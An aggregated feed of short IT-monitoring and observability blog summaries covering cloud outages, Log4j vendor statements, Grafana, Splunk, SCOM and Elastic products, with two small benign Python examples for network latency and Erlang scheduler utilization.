With David Pickavance, Senior Sales Engineer at Apollo GraphQL. Learn how to use Honeycomb, Apollo Studio, and OpenTelemetry to optimize GraphQL performance for a federated graph. See how to debug a federated GraphQL query across subgraphs and down to the database layer using Honeycomb.

Global Azure AD Outage Affecting Microsoft 365 Services December 15

Microsoft has had its own share of outages recently, and during the evening of December 15th Azure AD was the cloud culprit. The Exoprise sensors detected this Microsoft 365 outage more than an hour before Microsoft informed customers of the issue. Users who attempted to sign in to Microsoft services ran into errors. Most of our worldwide customers knew of the problem well in advance, before users or the business suffered.

ITOM 2021 recap: Features that enabled an incredible network management experience

From introducing new automation capabilities to offering all-new integration options this past year, ManageEngine’s ITOM suite of solutions has been supercharged to seamlessly manage complex networks. These new, powerful product enhancements and feature releases have honed the ITOM suite’s superior network management capabilities for IT admins worldwide.

Nastel Products Are Not Affected by Log4j Vulnerability Issues

Recent news about Log4j has enterprises and vendors scrambling for information and answers, including customers of messaging middleware and Integration Infrastructure Management (i2M) products. Nastel Technologies customers will not be exposed to any risks from this vulnerability, but enterprises are encouraged to check with their Cloud and other solution vendors to protect themselves and their data.

Cloud monitoring 101

Cloud monitoring is a concept that refers to a process of examining, monitoring, and controlling a cloud workflow. Cloud monitoring may be performed manually or via automated monitoring services or technologies to ensure that a cloud is operating. This procedure, centered on security and administration, has become critical for firms that depend on cloud technology.

Customer Experience: Working with OpsLogix

Microsoft's System Center Operations Manager (SCOM) is a monitoring platform that comes with many potential benefits; however, it can also be overwhelming to manage and be responsible for. With extensive, up-to-date knowledge and experience with SCOM, we provide products and services at the forefront of monitoring. In addition to these products and services, OpsLogix offers personal support and various sources of digital content to help customers get more out of them.

RapidSpike 2021 Christmas Message

Whilst 2021 has been a tough year for many of us, almost as tough as 2020, whether in business, professionally or personally, we need to remain optimistic in 2022. Ecommerce and selling goods online will only grow stronger, and Nasdaq's prediction that 95% of goods will be sold online by 2040 is being realized much faster because of the COVID pandemic.

SecOps for Safer, More Efficient ITOps

When the Nobel Prize for physics was announced in October 2021, one of the winners was Italian theoretical physicist Giorgio Parisi, whose groundbreaking research helped decode complex physical systems, opening the door for breakthroughs in mathematics, science, and artificial intelligence. Decoding complex physical systems? If the science thing didn’t work out, Parisi could have pursued a career in security operations.

Introducing the Sentry data source plugin for Grafana

We’re thrilled to announce the addition of the Sentry data source plugin to Grafana. Grafana Labs worked in partnership with Sentry, the code observability platform, to help development teams see the issues that matter and solve them faster — across their entire tech stack — so they can remove silos and ship with confidence.

Yes, Open Source Is Sustainable

Two months ago, we announced our annual investment in open source maintainers, mostly folks whose work we depend on to deliver Sentry to you, plus a few research and hobby projects that our employees put on our radar. Two days ago, six of these maintainers joined us for a one-hour panel called “The Future of Open Source: Is It Sustainable?” I co-hosted with Jessica Lord, Product Manager of GitHub Sponsors.

How to Perform Log Analysis

Logfile analysis plays a central role in enhancing the observability of your IT estate, helping operations teams and SRE engineers to identify issues as they emerge and track down the cause of failures quickly. As the number of log entries generated on any given day in a medium-sized business easily numbers in the thousands, viewing and analyzing logs manually to realize these benefits is not a realistic option. This is where automated real-time log analysis comes in.

Simplify Your Budget Planning with Ingest-Only Pricing for LogStream Cloud

Over the last year, we’ve seen tremendous growth in both demand and usage for LogStream Cloud. It is exciting to be able to speed up time to value, reduce the total cost of ownership, and deliver LogStream to customers in a way that best fits their organizational needs. We here at Cribl have been working with our cloud customers to better understand how to optimize LogStream Cloud pricing to provide the best possible ROI.

VMware Advanced Monitoring for Horizon - App Volumes

Beyond VMware Horizon, eG Innovations includes purpose-built, fully integrated modules for other VMware technologies and even third-party products likely to be used alongside Horizon. Technologies supported include the Blast Extreme protocol, VMware Unified Access Gateway (UAG), thin clients, and of course, App Volumes. Today, I’ll focus on how to monitor App Volumes both through full insights from App Volumes Manager and through continuous monitoring of user endpoints.

A Year of WebPageTest and Catchpoint: A Q&A with Tim Kadlec and Jeena James

Look out for our other video Q&As this week with Catchpoint co-founders, Mehdi Daoudi, CEO and Dritan Suljoti, Chief Product and Technology Officer. Jeena: Can you tell us what you've been up to, what you've been doing with the team for the last couple of months, and how's it been so far with Catchpoint and WebPageTest?

Replay Log in Distributed Icinga Environments

An essential part of a distributed monitoring environment with Icinga that includes master, satellite and agent nodes is the replay log functionality. The replay log is a built-in mechanism that ensures nodes in a distributed setup keep the same history (e.g., check results, notifications and downtimes) if nodes are temporarily disconnected and then reconnect.

Tutorial: Getting Started with AWS Lambda and Node.js

AWS Lambda is an incredible tool that works well with an abundance of other services on AWS. In this hands-on walkthrough, we’ll show you how to get started and create your first Node.js AWS Lambda function. Once upon a time, not so long ago, a word caught my ear. Lambda. That struck a chord, remembering the good old days of playing Half-Life as a kid. Little did I know what AWS Lambda was and how incredibly awesome it is. If you’re intrigued, stick around.

Splunk RUM Frontend Error Monitoring is Now Generally Available!

Debugging errors is an essential component to SRE and developer workflows. “How do we prioritize and isolate JavaScript errors more effectively?” is a top challenge we hear from engineering teams looking to improve end-user experience. Therefore, we are excited to announce the general availability of Splunk RUM frontend error monitoring.

Five Critical Insights You Won't Get With Your Cloud Provider's Monitoring Solution Alone

When meeting with a current or prospective Splunk customer, one question we are often asked is “Why do I need Splunk when I can just use AWS CloudWatch, Azure Monitor, or GCP Cloud Operations Suite (formerly known as Stackdriver) for my cloud monitoring needs?” And what a great question it is!

The 2022 State of Observability Report

Interest in observability is at an all-time high. When we attended KubeCon in Los Angeles in October, observability and security were everywhere—in conversations with attendees and other vendors, during sessions, and in messaging at booths—indicating that there’s still an unmet need. In fact, Gartner declared that observability is at the ‘peak of inflated expectations' in a recent Hype Cycle report.

JavaScript security: Vulnerabilities and best practices

If you run an interactive website or application, JavaScript security is a top priority. There’s a huge array of things that can go wrong, from programmatic errors and insecure user inputs to malicious attacks. While JavaScript error monitoring can help you catch many of these issues, understanding common JavaScript security risks and following best practices is just as important.

A first look at Amazon CloudWatch Real User Monitoring

Real User Monitoring (RUM) has been providing valuable insights into real user experiences for many years. It’s not every day that we see a new player enter the market, but last week we did, and a very powerful player at that – Amazon. Real User Monitoring for Amazon CloudWatch was announced at AWS re:Invent 2021, adding to their existing suite of over 200 products and services. As you can imagine, our ears perked up at this announcement and we’re eager to take a look.

Speed vs Uptime | Where to Focus This Holiday Season

Revenue and consumer confidence are at stake this holiday season for brands worldwide. Shoppers are on the prowl for deals, and their predator instincts hunt for bargains in milliseconds. Google cites convenience, price, and availability as the top three reasons why consumers choose to shop online. Today’s online shopping has built an expectation for ease of use, and consumers have evolved into apex shoppers.

Our $350M funding round will accelerate our cloud and container security momentum into global scale

I am excited to announce today that we have raised an additional $350M at a valuation of $2.5B, more than doubling our valuation and bringing our cumulative funding since inception to ~$750M. This funding reflects investor conviction in our ability to be the dominant cloud and container security platform, and brings us closer to our vision of helping every organization to confidently run modern, cloud-native applications.

11 Best Bugsnag Alternatives You Should Try

Bugsnag is a stability error monitoring solution which captures unhandled exceptions, diagnostic data, and version information in browser, mobile and server-side applications via open source SDKs for 50+ software platforms. By default, Bugsnag libraries capture all crashes (handled exceptions are optional), version numbers, and session information to help engineering teams proactively surface issues and save time fixing bugs.

Sponsored Post

How to Manage Your AIOps for Optimal Efficiency

“Have you tried shutting it off and turning it back on?” While AIOps won’t likely remove this query from our vocabulary any time soon, technology is certainly here to take on the bulk of the heavy lifting. For companies of all sizes, service calls are still going to continue to pour in. And there’s no sign of any of the world’s CompTIA certs going to waste in the near future. Still, thanks to AIOps, many jobs within the world of IT will become more streamlined.

Identify operational issues quickly by using Grafana and Amazon CloudWatch Metrics Insights

Amazon CloudWatch has recently launched Metrics Insights (Preview) — a fast, flexible, SQL-based query engine that enables you to identify trends and patterns across millions of operational metrics in real-time. With Metrics Insights, you can easily query and analyze your metrics to gain better visibility into the health and performance of your infrastructure and large scale applications.

The Best Tools for System Monitoring

It takes a lot to run a modern business. From websites to technical solutions and everything in between, it’s no surprise we need better monitoring systems to make sure everything is operational. With multiple gears turning at once on any given platform, incidents are inevitable—especially for companies that are constantly growing and innovating. And the impact of incidents can affect user services, operations, and even business reputation.

Metric Correlations using unlimited data for monitoring and observability

Correlate your monitoring metrics to make even better decisions about how to handle incidents in your infrastructure using our Metric Correlations. You can now select an unlimited amount of time to troubleshoot all of your monitoring metrics. Netdata’s free, open-source monitoring agent works with Netdata Cloud to help you monitor and troubleshoot every layer of your systems to find weaknesses before they turn into outages.

How to find cloud logs and manage logging costs

We covered best practices for ingesting, centralizing, and managing cloud logs in our previous episode. But how can you quickly find the logs you're looking for when troubleshooting? And how can you manage and optimize your logging costs? In this episode, we'll show you how to use advanced log queries to find the exact logs you're looking for and how to manage logging costs.

Increase resilience: Respond to change with Avantra custom checks

SAP’s products, technology and development are rapidly changing. Once focused on on premise applications, SAP’s focus on rapid innovation in cloud technologies brings exciting, transformative change to your business. But it has also upended the way these new business critical applications need to be supported and administered.

Avantra 21.11: Extend Avantra with critical checks and automations

What makes the Avantra platform incredibly powerful for our customers is the ability to extend the standard checks and automations available with your custom business logic. While Avantra has an opinion of the key things to monitor in your landscape, we often hear of our customers building business critical checks and automations to extend Avantra and add features to look after the things your business cares about.

A Year of WebPageTest and Catchpoint: A Q&A with Dritan Suljoti and Jeena James

As all of us at WebPageTest and Catchpoint celebrate one year of partnership, Jeena James, WebPageTest, sat down for a Q&A with Dritan Suljoti, Chief Product and Technology Officer and co-founder, Catchpoint, to look at the key milestones from the last year, and ahead at what's next! Hope you enjoy!

Incident Review: Another Week, Another AWS Outage

The following is an analysis of the Amazon Web Services incident on 12/15/2021. It may be the holiday season for most of us, but for AWS it appears to be Groundhog Day, Bill Murray style. For the second week in a row, the company reported an outage, this time affecting its US-West-2 region in Oregon and US-West-1 in Northern California.

Introducing Icinga Module for vSphere - Releasing version 1.2

One of the pillars of Icinga is integrations. With its open APIs and various extensions, Icinga is capable of integrating seamlessly into your existing infrastructure. Today I want to give you an introduction to our VMware integration and share some details about the latest release. The Icinga Module for vSphere® is an Icinga module dedicated to collecting, monitoring and visualizing data from your VMware environment.

Do you know what BYOD, BYOA, BYOT are? No? You lack experience!

We apologize in advance for this extremely freaky reference: If in the well-known science fiction saga Foundation there was a duty to collect all the information of the galaxy to save it, at Pandora FMS we have assigned ourselves the task of making a glossary worthy enough with all the “What are” and the “What is” of technology. And today, without further delay or freakiness, it’s time to define the acronyms: BYOD, BYOA, BYOT.

AWS Machine Learning Tools (2022 edition)

When you want to stay ahead and on top of things in a fast-moving industry, machine learning (ML) is surely one of the trending solutions. Today, innovative companies already have leading Machine Learning tools well-integrated into their processes. In comparison, your start could seem dreadfully slow. Or maybe you just don’t have the time or resources to invest in running your own Machine Learning training infrastructure.

Anomaly Detection

IT Operations has a wide spectrum of roles and responsibilities. The positions range from level 1 (L1) operators to Site Reliability Engineers (SREs) and everything in between. L1 operators, for example, are (often) almost exclusively reactive. They feed off the constant stream of incidents reported by clients and events that are reported by monitoring and alerting systems. This is in contrast to SREs, who work at the other end of the spectrum.

Splunk Mobile, iPad, AR and TV in Private Networks

Having Splunk Mobile available in your pocket is great, but what if you're not able to take advantage of it because of Defense Federal Acquisition Regulation Supplement (DFARS) requirements or security concerns? Through this blog post, you'll learn how deploying a Private Spacebridge might be the right answer!

Citrix Provisioning Services Monitoring

Bottlenecks and performance issues in the PVS servers might cause long boot times and the inaccessibility of desktops and applications. Monitoring of PVS servers and their performance is therefore essential. The keys to proactively identifying PVS problems are in-depth visibility of key performance indicators of the server operating system (MEM, IOPS), the infrastructure (PVS services, PVS streaming errors), and the underlying component layers (PVS sites, vDisks, target devices, etc.).

The Log4j Log4Shell vulnerability: Overview, detection, and remediation

On December 9, 2021, a critical vulnerability in the popular Log4j Java logging library was disclosed and nicknamed Log4Shell. The vulnerability is tracked as CVE-2021-44228 and is a remote code execution vulnerability that can give an attacker full control of any impacted system. This blog post gives an overview of the vulnerability, its detection, and its remediation, and looks at how to leverage Datadog to protect your infrastructure and applications.

You can now monitor the health of your application and server

We're proud to announce that we have added a major new feature to Oh Dear: Application Health monitoring. Using Oh Dear, you can now monitor various aspects of your application and server and get alerts about them. You can monitor any aspect of your app that you want.

Get Started with the Public Beta for Unified Dashboards

During Logz.io’s ScaleUp 2021 user conference, we announced that Unified Dashboards were coming to you soon. And now they’re finally here for anyone to try during the Public Beta. Unified Dashboards will allow Logz.io customers to analyze and filter their logs, metrics, and traces side-by-side on a single monitoring dashboard. Check out our recent blog to learn about why we built Unified Dashboards and the value they bring to customers.

Splunk AR - What's new .conf 2021

Want to deploy Splunk AR out in the field? Splunk AR is a powerful application that allows field workers to quickly gain valuable insights from assets in your deployment. With Splunk data supporting them, field workers can take action. In addition, we’ve built a powerful admin suite to support making an AR experience seamless and manageable. In this video, we talk about all the new capabilities we’ve built in 2021 for Splunk AR and how your company can take advantage of it.

How to Measure Network Latency | Obkio

Latency is one of the core network metrics that you should be measuring when monitoring your network performance. Latency refers to the round-trip time it takes for data to reach its destination across a network. Consistent delays or odd spikes in time when measuring latency are signs of major performance issues in your network. The most accurate way to measure latency is by using network monitoring software, like Obkio.
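
As a rough illustration of the round-trip idea described above, the following Python sketch times a TCP handshake as a stand-in for one round trip and flags samples that spike well above the median. It is not how Obkio or any other monitoring product measures latency; the function names, the default port, and the 3x-median spike threshold are all assumptions chosen for this example.

```python
import socket
import statistics
import time
from typing import List, Sequence


def tcp_round_trip_ms(host: str, port: int = 443, timeout: float = 2.0) -> float:
    """Time one TCP handshake to host:port, in milliseconds.

    connect() returns once the SYN/SYN-ACK exchange completes, so the
    elapsed time approximates one network round trip (plus local overhead).
    """
    start = time.perf_counter()
    with socket.create_connection((host, port), timeout=timeout):
        pass  # connection is closed immediately; only the handshake is timed
    return (time.perf_counter() - start) * 1000.0


def find_spikes(samples_ms: Sequence[float], factor: float = 3.0) -> List[int]:
    """Return the indexes of samples greater than factor x the median.

    The 3x default is an arbitrary illustrative threshold, not a standard.
    """
    if not samples_ms:
        return []
    median = statistics.median(samples_ms)
    return [i for i, sample in enumerate(samples_ms) if sample > factor * median]
```

To try it, collect a handful of samples with something like `[tcp_round_trip_ms("example.com") for _ in range(10)]` (the hostname is a placeholder) and pass the list to `find_spikes`. Comparing against the median rather than the mean keeps a single large outlier from raising the threshold it is judged against.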

Bytecode transformations: The Android Gradle Plugin

This is the first part of a blog post series about bytecode transformations on Android. In this part we’ll cover different approaches to bytecode manipulation in Java as well as how to make it work with Android and the Android Gradle plugin. In the next two parts we’ll dive into the actual bytecode, bytecode instructions and how we can modify the bytecode and inject our own instructions, using Room as an example.

How to Find, Fix, and Prevent Node.js Memory Leaks

When your application starts to grow, one of the essential factors to consider while scaling is memory management. Poor memory management leads to memory leaks, thus affecting application performance. When the performance degrades, it will directly affect the business. So, it is essential to look out for and fix memory leaks in time. This blog post will look at what memory leaks are and how to avoid them in Node.js applications.

Coralogix is Live in the Red Hat Marketplace!

Coralogix is excited to announce that our Stateful Streaming Data Platform is now available on the Red Hat Marketplace. Built for modern architectures and workflows, the Coralogix platform produces real-time insights and trend analysis for logs, metrics, and security with no reliance on storage or indexing, making it a perfect match for the Red Hat Marketplace.

The Future of Open Source: Is it Sustainable?

Open Source projects are at the heart of most software that we depend on everyday. Community-supported volunteers work behind the scenes to make open source better for everyone, but it can be a thankless—and penny-pinching—job. Is it sustainable? Join us in a live virtual event with GitHub Sponsors to find out. We’ll showcase leading maintainers in the community and discuss the future of open source sustainability.

Perfecting the Customer Onboarding Experience for MSPs

Onboarding is an in-depth process that sets the stage for relationships between Managed Service Providers (MSPs) and their customers. Perfecting the onboarding experience will give customers the confidence that choosing an MSP to manage their IT was, and is, the best choice. A poor first impression can damage credibility, so it’s vital to have a solid plan in place.

Why is my SaaS application so slow?

Many companies today rely on SaaS connections in order for the business to function. Some users simply can’t operate in their job when an application becomes unavailable. When hundreds of users are impacted, this can cost a company serious money. That’s why keeping a proverbial finger on the pulse of application performance is generally worth the effort. But, it isn’t easy. Many popular SaaS applications are delivered from hundreds of locations around the world.

How to Perform Point-in-Time Recovery of a SQL Server Database

In a previous post in the backup and restore series, How to Restore Databases From Native SQL Server Backups, Tim mentioned some more advanced options when restoring a database backup, including performing point-in-time recovery of a SQL Server database (sometimes known as PITR). In this tutorial, I’ll build on the information in Tim’s post by showing you how to use backups to perform point-in-time recovery and a more advanced way to determine an exact point to restore to.

Gartner IT IOCS Highlights: How Accenture Powers Automation Through Observability and StackState's 4T Data Model

Accenture’s vision for value-led, business-aligned operations applies Machine Learning, Automation and Observability to help cloud-hosted and on-premise systems diagnose and heal themselves. The company’s ubiquitous myWizard® platform, used by 100,000+ practitioners at more than 3000 companies, applies StackState’s advanced 4T Observability data model to improve service to Accenture’s customers.

A Year of WebPageTest and Catchpoint: A Q&A with Mehdi Daoudi and Jeena James

As WebPageTest and Catchpoint celebrate one year of partnership, Jeena James, General Manager, WebPageTest, sat down for a Q&A with Mehdi Daoudi, CEO and co-founder, Catchpoint, to look at the key milestones from the last year, and ahead to what's next! Hope you enjoy!

5 Network Traffic Analysis Tools to Know About

Network traffic analysis serves many purposes. It’s used for general network monitoring, for security, and for debugging network issues. It can be helpful not only to network administrators but also to application developers. In this post, you’ll learn what network traffic analysis tools actually are and which five you should know about.

HoneyByte: Using Application Metrics With Prometheus Clients

Have you ever deep dived into the sea of your tracing data, but wanted additional context around your underlying system? For instance, it may be easy to see when/where certain users are experiencing latency, but what if you needed to know what garbage collection is mucking up the place or which allocated memory is taking a beating? Imagine having a complete visual on how an application is performing when you need it, without having to manually dig through logs and multiple UI screens.

What's New with DX Unified Infrastructure Management 20.4

DX Unified Infrastructure Management (DX UIM) enables comprehensive infrastructure observability. The solution delivers comprehensive coverage, modern administrative and operator consoles, zero-touch configuration, advanced alarm management, and more. This solution provides a unified, data-driven approach to infrastructure management. With the solution, your teams can proactively and efficiently manage all your digital ecosystems, including private and public clouds.

Enabling the Self Driving Cloud with Splunk Observability Cloud and GKE Autopilot

In 2021, any time that you access any kind of web service, whether it be via a website or app, chances are high that the backend is running on Kubernetes. Hundreds of thousands of organizations rely on Kubernetes to power and manage their mission critical services every day, and the reliability and scalability benefits offered by Kubernetes have been felt across the industry.

Host and process metrics - monitoring beyond apps

Consumers and users of applications expect near 100% availability and reliability to work, transact, collaborate, etc. There’s a lot of talk about monitoring the performance of the application itself, but what about the underlying systems and components supporting the app, and in particular the infrastructure it sits on? If any piece of this stack fails, it can negatively impact the user experience, and in turn, your business.

The 5 Biggest Internet Of Things (IoT) Trends In 2022

The Internet of Things (IoT) is a term that describes the increasingly sophisticated ecosystems of online, connected devices we share our world with. The slightly odd name refers to the fact that the first iteration of the internet was simply a network of connected computers. As the internet grew, phones, office equipment like printers and scanners, and industrial machinery were added to the internet.

Top 5 SCOM issues and how to solve them

Many organizations aspire to a world where everything is in the cloud. But in reality, most IT enterprises still rely on traditional on-prem monitoring technologies. As a market-leading monitoring tool, SCOM is ideally placed for the job, monitoring both on-prem workloads and workloads that link up to the cloud. So, as SCOM is central to most companies’ monitoring, it is essential you understand how to be successful with SCOM!

Upcoming Holidays Got You Down? Plan to Start 2022 off Right

With the holidays coming up, are you worried about Microsoft 365 and Teams performance while your IT team is off? Martello gives IT teams complete end-to-end visibility of the Microsoft 365 and Teams user experience, so they can rapidly detect and easily resolve problems before they impact users and you can finally take that break you deserve.

Query and analyze Amazon S3 data with the new Amazon Athena plugin for Grafana

In collaboration with the AWS team, we have recently released the new Athena data source plugin for Grafana. Athena is an interactive serverless service that makes it easy to analyze data in Amazon S3 using standard SQL. Athena supports a wide variety of data formats including CSV, JSON, ORC, Avro, and Parquet. Athena also integrates with AWS Glue Data Catalog, which allows you to create tables and query data based on a central metadata store of many AWS services, such as CloudFront, ELB, and more.

Monitor Scheduler Utilization in Elixir With AppSignal

When it comes to monitoring your Elixir application, it's challenging to make sense of the many metrics and statistics that you can read from the internals of the Erlang virtual machine. In this post, we'll be looking at the scheduler utilization metric in order to understand what it is, why we should monitor it, and how to monitor it.
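
As a rough illustration of what the metric measures, scheduler utilization is commonly derived from two samples of per-scheduler counters: the share of elapsed time a scheduler spent doing work between the samples. The Python sketch below assumes samples shaped like the `(scheduler_id, active_time, total_time)` tuples reported by the Erlang VM's `scheduler_wall_time` statistic. The function name and the sample numbers are hypothetical, and this is not necessarily how AppSignal computes the value.

```python
from typing import Dict, List, Tuple

# One sample per scheduler: (scheduler_id, active_time, total_time).
# The shape mirrors Erlang's scheduler_wall_time statistic (an assumption here).
Sample = Tuple[int, int, int]


def scheduler_utilization(before: List[Sample], after: List[Sample]) -> Dict[int, float]:
    """Return the busy fraction (0.0 to 1.0) per scheduler between two samples."""
    previous = {sid: (active, total) for sid, active, total in before}
    utilization = {}
    for sid, active, total in after:
        active_before, total_before = previous[sid]
        elapsed = total - total_before
        # Guard against a zero-length interval between the two samples.
        utilization[sid] = (active - active_before) / elapsed if elapsed > 0 else 0.0
    return utilization


# Hypothetical readings, taken some time apart.
first = [(1, 100, 1000), (2, 50, 1000)]
second = [(1, 600, 2000), (2, 150, 2000)]
result = scheduler_utilization(first, second)
print(result)
```

Working from the difference between two samples, rather than the raw counters, is what makes the figure reflect recent load instead of the average since the VM started.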

Let the Orion Platform Do the Heavy Lifting | Using the Orion API for Fun and Profit: Session 2

Continuing the discussion from the previous THWACK Livecast about letting the Orion® Platform products automate your work, we’ll step away from the web console and start digging into the SolarWinds Orion Application Programming Interface (API). The power of the Orion API is in its flexibility. If you want to unmanage or mute devices to coincide with your change management windows, perform bulk actions on devices, or even add devices to monitoring from nothing more than an IP address, it can be done with the API.

2021 AWS Outage and How To Prevent Your Websites and Applications From Being Impacted

December 7 started as a typical, but busy, pre-holiday weekday. This included a mix of booming online retail sales ($33.9 billion spent during cyber week), packages flooding delivery services, and high online traffic. But much of that quickly came to a crawl. An outage of the AWS us-east-1 cloud region changed the good fortune for many websites and applications and impacted the lives of consumers across the United States and parts of Europe.

WebPageTest and Catchpoint: Our Year Building and Growing with the Community

WebPageTest recently completed a year as part of the Catchpoint family (yes, we acquired a company during the pandemic). In the past twelve months, we have built an entire WebPageTest team to power the developer experience around web performance. We’ve also launched initial premium experiences on the platform. Our developer community continues to contribute to the beloved open-source version, as well as share best practices with other users.

You are a sinner (of data management)!

Let’s get to the point about data management: businesses need data, but accumulating too much can be detrimental. Data overcrowding can corrupt IT professionals, turning them into greedy hoarders. Gorging on repeated, outdated, or banal information, the so-called ROT data, is bad. Companies of the world! The Devil tempts you with Big Data, something that can be harmful in excess. We tell you all about it in this article.

Enterprise IT Dashboards

Interpreting data and making fast decisions is critical for any leader in today's business world. But how is it done? Everyone remembers the old way of doing things where analysts would manually crunch the numbers and give a final output. This business intelligence would be presented to their boss, and decisions would be made. This batch way of running numbers and presenting them is not sustainable due to the massive amount of manual effort involved to recompile datasets and present them properly.

Splunk Cloud Self-Service: Announcing The New Admin Config Service API For Private Applications

In our last blog, "Splunk Cloud Self-Service: Announcing the Admin Config Service (ACS)" we introduced our modern, cloud-native API that is enabling Splunk Cloud Platform admins to manage their environments in a self-service fashion. In this blog, we take a look at our latest effort to empower our customers: ACS private app management.

A Full Guide on Using Application Monitoring for Your Business

Wondering whether you can optimize your business using application performance monitoring? The answer is “Surely!” Our full guide on application monitoring usage will serve as proof. Contemporary businesses and startups depend on software applications for running their digital activities and supplying SaaS or AaaS (application-as-a-service). Nowadays, expedited application and service delivery without sacrificing quality is a top concern.

The Future-Proof Experience Framework w/ Tech Mahindra

Time is a luxury that IT workers don’t often have – and that’s particularly true after the massive upheaval all of our businesses have experienced since the pandemic. Ever since the working model changed overnight and digital transformation accelerated to warp speed, IT teams have had to implement new initiatives quickly in order to keep up. But how can they know that these initiatives have been successful?

TL;DR InfluxDB Tech Tips: IoT Data from the Edge to Cloud with Flux

When it comes to writing data to InfluxDB, you have a lot of options. You can: The last bullet is the most powerful and flexible way of maintaining and managing your fleet of IoT devices. That architecture offers you several advantages including: Architecture drawing of the last bullet. Sensors write data to an OSS instance of InfluxDB at the edge which in turn write data to InfluxDB Cloud.

What is the Log4j 2 Vulnerability?

Over the last few days, there has been a tremendous number of posts about the Log4j 2 vulnerability, with Wired going so far as to claim that “the internet is on fire.” Tl;dr: LogDNA is not exposed to risk from the Log4Shell vulnerability in Log4j 2 at this time. If that’s all you came for, you can stop reading here. If you want to learn more about the vulnerability and how LogDNA protects you from risks like these, grab a cup of coffee and read on.

Cloud computing has won. But we still don't know what that means

There’s little doubt that cloud computing is now the absolutely dominant force across enterprise computing. Most companies have switched from buying their own hardware and software to renting both from vendors who host their services in vast anonymous data centers around the globe.

Observability Vs Monitoring: Key Differences You should know

In the computing world, observability and monitoring hold an important place. Both terms have recently seen heavy use in IT infrastructure circles and among developers, as observability and monitoring have been extremely effective in tracking events. The two are intertwined, but there is a fine line of separation between them. What? Why? What's the difference? These are the questions that have to be answered. Let's figure out the reasons here.

Observing Kubernetes With LM Logs

As more and more IT organizations move towards containerized workloads and services, it is more important than ever to have insight into the containers and the services running within. Leading the container orchestration charge is Kubernetes (aka k8s – the 8 represents the letters omitted from the middle of the word). In fact, about two-thirds of IT engineers have seen their Kubernetes adoption increase during the pandemic as the need for scaling and performance grows.

Dashboard Fridays: Sample Zendesk Support Dashboard

Our Support Team wanted a real-time overview of all the cases currently in play so they could monitor multiple channels in one place. This dashboard gives the team a real-time view of their tickets by type, status, topic, and more! Join Adam Kinniburgh and our Customer Support Manager Mike Halfacree as they showcase this sample Zendesk dashboard - how it's made, who it's for, the challenges it solves and how you can easily replicate it!

SAP HotNews analysis: What MSPs need to know

SAP is one of the most business-critical enterprise applications. As a result, keeping it secure is a top priority for managed service providers. In the last year SAP has notified its customers of multiple high-risk vulnerabilities through its SAP HotNews email alerts, which require urgent patching – but the challenge for MSP clients is to know “do these impact me?”

What are Linux Logs? How to View Them, Most Important Directories & More

In software, it’s essential to monitor logs of system activities. Today we’ll unravel what Linux logs are and how you can view them. Logging is a must for today’s developers, which is why Retrace was designed with a built-in, centralized log management tool.

AWS outage leaves millions in the dark, points to need for better API monitoring

Millions of users of popular apps, such as Facebook, Ring, Alexa, Disney+, and more were left scratching their heads wondering when they would be back online due to a widespread Amazon Web Services (AWS) outage Tuesday. The outages were centered on a number of core AWS services in the US-EAST-1 Region, including increased API error rates with Amazon DynamoDB, Amazon Elastic Compute Cloud and Amazon Connect, which handles contact center calls. — AWS Service Health Dashboard

Monitor and optimize S3 storage with Amazon S3 Storage Lens metrics

With Amazon S3’s scalable object storage, you can store and manage billions of objects across multiple AWS accounts, regions, and storage classes. S3 Storage Lens provides 29 useful metrics that give you deeper visibility into your S3 usage and activity across your entire organization. We are proud to be a pre-integrated AWS partner using the new CloudWatch publishing option to bring S3 Storage Lens metrics into Datadog for enhanced S3 storage monitoring.

Why are so many BMC customers looking to replace their Middleware Management ("BMM") solution?

A growing number of BMC users are looking for a suitable replacement for BMC’s Middleware Management (“BMM”) solutions. The most frequently cited reasons for which these organizations are looking to replace their BMC software include: Nastel’s core business is Integration Infrastructure Management (i2M). Nastel believes that the Integration Infrastructure (commonly known as “middleware”) is the nervous system of every digitally integrated business.

Designing and Migrating to a Service-Centric Management Model with ScienceLogic

As enterprises begin to migrate away from device-centric management to a service-centric model of IT operations, it is vital that IT operations and management (ITOM) leaders start by addressing the need for comprehensive visibility across their IT infrastructure. Gaining a contextual view of your full-stack service topology, based on real-time collection of data, is necessary to keep pace with the speed of change inherent with today’s dynamic and fast-paced business environment.

Monitoring VMware Horizons App Volumes with eG Enterprise

VMware App Volumes is a powerful technology that enables the real-time delivery and lifecycle management of applications. Learn how eG Enterprise supports fully integrated live monitoring and alerting for App Volumes without the need for custom scripts and full historical reporting.

What is External Services Monitoring, and Why is it Important?

There are a lot of important components needed to run a successful web application. The language you code it in, which developers are working on the project, and the integrations with other services are enormous aspects of the process. One essential part of running an application, however, is monitoring.

How Monitoring as a Service helps you achieve resource-efficient success!

Microsoft's System Center Operations Manager (SCOM) is a resource-intensive tool to work with, not least when it comes to competence and time. The SCOM platform can come across as rather heavy to work with and often requires some expertise to take full advantage of its benefits. In our experience, SCOM also holds little appeal for the new generation of employees, even though they are inclined to move towards a career in IT.

Prioritize the Right Performance Monitoring Metrics

Now every developer can customize the performance monitoring charts and data views on the Performance page to see what is most important to them and their team, helping prioritize relevant performance monitoring metrics so they can take action faster. And when you jump back into Sentry Performance, the page is saved right where you left off. Say you’re working on a new release. You can edit your Performance page to include User Misery, Transaction Throughput, and Failure Rate.

ElasticON Global Opening Keynote: Solving for Innovation

Join co-founder and CEO Shay Banon, Chief Product Officer Ash Kulkarni, and special guest Scott Guthrie, Executive Vice President of Cloud and AI at Microsoft, to hear the latest about Elastic’s vision for the future. Speakers: Shay Banon, Founder & CEO, Elastic; Ash Kulkarni, Chief Product Officer, Elastic; Scott Guthrie, Executive Vice President of Cloud and AI, Microsoft.

Elastic Observability Keynote: Unified, Actionable, Frictionless

Elastic Observability makes it easier for organizations to store, search, and analyze any type of data, from any source, to keep systems running (and customers happy). And with our most recent release, we’ve continued to make this even faster and simpler, from automated root cause analysis to centralized agent management with Elastic Agent. Join the keynote to learn what’s on the Elastic Observability roadmap and how upcoming innovations will continue to break down barriers for users with frictionless onboarding, integrated workflows, and actionable observability with AIOps.

Microservice Choreography and Triaging Errors with Elastic Observability and the Elastic Stack

Brolly is Australia’s leading social media archiving service, comprising dozens of microservices deployed to Kubernetes. Learn how Brolly leverages the Elastic Stack to collect pod and infrastructure logs, keep track of failures in the data pipeline, and identify and recover from errors. Speakers: Salman Ahmed, Solutions Architect, Brolly; Omid Mirzaei, Software Engineer, Brolly.

Unifying VM and microservice monitoring with Kubernetes, Prometheus, and Grafana

